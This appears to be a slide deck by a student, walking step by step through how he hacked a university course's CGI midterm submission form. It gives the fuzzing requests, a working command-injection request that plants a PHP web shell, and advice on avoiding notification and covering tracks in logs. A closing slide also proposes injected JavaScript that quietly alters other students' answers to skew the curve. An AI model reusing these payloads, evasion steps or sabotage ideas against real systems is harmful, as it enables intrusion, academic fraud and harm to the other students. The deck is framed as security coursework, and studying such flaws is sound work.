Hacking the Midterm
For Profit Grades and Fun
Mike Gerschefske
HACKING THE MIDTERM
(Rev 2)
About Me
UCCS – B. S. Computer Engineering ’05
UCCS – M.E.I.A ever since
Just need to finish project :(
iCTF (International Cyber War Games)
Going on 4th year with UCCS
The MITRE Corporation
Beautiful Girlfriend Kelly
Interests in RE, etc.
Intro
Actually hacked the review exam
Assume the actual test works just like the review
No source code
Locked Down
Already have read access to most things (shell access)
Other people’s midterms, etc.
Misc auth files
Do we even need to hack it? Maybe … What’s our goal?
http://cs.uccs.edu/~cs502/CS502M2008midterm.html
How does the midterm work?
Fill out form and press Submit
Username
Password
Answers
Form checks credentials
Saves midterm to disk
Emails midterm to Dr. Chow and User
The Midterm
On Submit
Echoes out everything submitted
and at the bottom of the screen…
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008
term=midterm
open filename=CS502M2008Grade.txt
login incorrect!
What we do know
Form is .cgi
Probably Perl
Form checks authentication in file:
CS502S2008Grade.txt
/users/server/faculty/chow/public_html/cgibin/grade/CS502S2008Grade.txt
Said so (in lesser words) on the web page
Assumptions:
Potentially grepping username file for valid credentials
Probably using Perl’s open command
What we do know (cont.)
Exams are saved here:
.../public_html/cgi-bin/grade/CS502/CS502M2008midterm/
Exams saved in the format:
exam_username_108_7_date
First Thought
Probably doesn’t check input values from
CS502S2008Grade.txt
Why would you, it’s trusted?
Exploit the trusted
If we could change a username in there, we might be able to exploit unchecked variables
If a name from that file is echoed out or handed to a shell unchecked, we could execute arbitrary system commands
Finding out more
Just hitting Submit (Empty exam) posts the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Why does it send: CS502M2008midterm?
Probably written to be generic
Returns:
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txt
login incorrect!
Modifying Requests
Empty exam request, then omit CS502M2008midterm:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Sending no exam parameter
Change to exam=&name=&login=…
Returns
name=exam, value=
class=, year=, semester= term=
open filename=Grade.txt
login incorrect!
Modifying Requests (cont.)
Send the following (fuzzing)
exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
Returns
name=exam, value=abcdefghicjklmnopqrstuvwxyz
class=abcde, year=ghic, semester=fghic
term=jklmnopqrstuvwxyz
open filename=abcdefghicGrade.txt
login incorrect!
Assumptions
First 10 characters of exam are prefixed to Grade.txt to form the authentication file name
10 characters is not a lot to work with
Probably takes a substring of the first 10 characters (exam[1..10]) and builds:
*Grade.txt
First thought, try to change location of Grade.txt
If we control it, we control potentially unchecked input
Assumptions
Probably issuing the following command
open “~chow/…/” + $10char + Grade.txt
The leading fixed file path prevents us from pointing it at /tmp
e.g. /tmp/abcGrade.txt is out of reach
This may be an avenue, but I found another solution so stopped pursuing this
Split Exam Input Value into Two Parameters
Exam value appears somewhere else
../public_html/cgi-bin/grade/CS502/CS502M2008midterm/*exams
First 10 characters CS502M2008 are prefixed to Grade.txt:
CS502M2008Grade.txt
Why do we upload the entire string CS502M2008midterm???
CS502M2008midterm
Since CS502M2008 is used for authentication we should leave this alone
Let’s modify midterm and see what it does…
Change exam=CS502M2008midterm to
exam=CS502M2008blah
Unauthenticated it creates a directory:
../public_html/cgi-bin/grade/CS502/CS502M2008blah
Authenticated it creates the directory CS502M2008blah, writes out the exam and then emails it
Don’t think I actually ever did this authenticated
If Authenticated
If folder for this midterm doesn’t exist, create it
Upload Exam to folder
Email Out copy to Dr. Chow and me
Assumptions
Code maybe calls mkdir or uses Perl to create the directory
Probably uses Perl to write out the file
Probably not writing socket code to do an SMTP call
Email Out
How does this work?
Email Out
Probably something like this:
exec( mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )
Probably doesn’t check the $dir_to_exam
Why would a directory name contain malicious content?
Can’t change $exam ($exam ~= $user_name) and we can’t change $user_name w/o modifying *Grade.txt
But we can modify $dir_to_exam!!!!
Our fuzzing even showed it could be any length
Authenticated vs. Unauthenticated
Regardless of authentication a directory is created
Creating directories doesn’t do very much for us
Only if authenticated will it run the mail program command
Execute My Command
Modify the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=
To:
exam=CS502M2008COMMAND&login=_LOGIN_&passwd=_PASSWD_
Note: if we don’t login correctly, the mail program won’t get executed
By keeping CS502M2008 the system will use CS502M2008Grade.txt to authenticate us
We (I) have (had) a username in this file
New Request
Need help encoding URLs:
http://www.w3schools.com/TAGS/ref_urlencode.asp
Let’s upload the following command:
& echo "<?php exec(\$_GET['command']); ?>" > a.php &
URL-encoded:
%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26
Full request body:
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
Last Request
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
Creates a directory called:
CS502M2008& echo "<?php exec(\$_GET['command']); ?>" > a.php &
Mail Program
Assumption:
exec( mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )
Is now turned into:
exec( mail -s exam [email protected] [email protected] < …/CS502/CS502M2008& echo "<?php exec( $_GET['command']); ?>" > a.php & /$exam )
The first & ends the mail command, the echo runs as a second command and writes a.php into the CGI’s working directory, and the leftover /$exam runs (and fails) as a third
The mail command’s stdin redirect now points at …/CS502/CS502M2008, which doesn’t exist, so mail itself never runs
Successfully creates …/grade/a.php, which takes commands and runs them as Dr. Chow
Conclusions
Consequently, this hack appears to never send out an email
– Dr. Chow is never notified that it was hacked
Or does it? It doesn’t, verified.
Access logs record the request line, so GET query strings are logged but POST bodies usually are not
Clean up the directories we’ve created and we’ve covered our tracks
Using a.php to run commands uses GETs, so every command probably ends up in the access log
Can easily change this to POSTs
Probably a wise idea to secure anything that remotely looks like a production system.
Backups
Evil Things to Do
Average test may take ~30+ minutes
Injecting JS that every 5-10 minutes picks a multiple choice question and changes the answer
Slow enough that people may not notice the change
If the user prints out a copy, the hard copy will be wrong too
Goal: lower everyone else's test scores by some reasonable amount to put yourself at the top of the curve
IDS
IDS probably could not have stopped this
At least not initially
This is a security test, so answers that would normally be acceptable (i.e. “how would you hack this site?”) look like attacks and an IDS might throw them away